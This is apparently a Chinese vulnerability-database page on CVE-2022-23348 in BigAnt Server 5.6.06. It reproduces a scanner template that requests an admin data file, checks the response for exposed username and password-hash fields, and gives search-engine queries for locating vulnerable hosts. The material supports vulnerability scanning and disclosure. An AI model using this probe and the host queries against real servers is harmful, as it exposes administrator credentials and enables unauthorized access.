CVE-2022-23348: BigAnt Server 5.6.06 - Improper Access Control

日期: 2025-08-01 | 影响软件: BigAnt Server | POC: 已公开

漏洞描述

BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2022-23348

info:
  name: BigAnt Server 5.6.06 - Improper Access Control
  author: arafatansari
  severity: medium
  description: |
    BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the access control issue.
  reference:
    - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348
    - http://bigant.com
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23348
    - https://www.bigantsoft.com/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-23348
    cwe-id: CWE-916
    epss-score: 0.01186
    epss-percentile: 0.7805
    cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: bigantsoft
    product: bigant_server
    shodan-query: http.html:"bigant"
    fofa-query: body="bigant"
  tags: cve,cve2022,bigant,unauth,exposure,bigantsoft

http:
  - method: GET
    path:
      - "{{BaseURL}}/Runtime/Data/ms_admin.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"user_name";'
          - '"user_pwd";'
          - '"user_id";'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f42c1a6f4a8b35b874e9b184608ba03e0e38512ddf28acb0a8e664b7291f5093022100f1824dce52961664b491c4cf4310d34e7cd2b9ed1792ecb78af51ad4db6853a1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐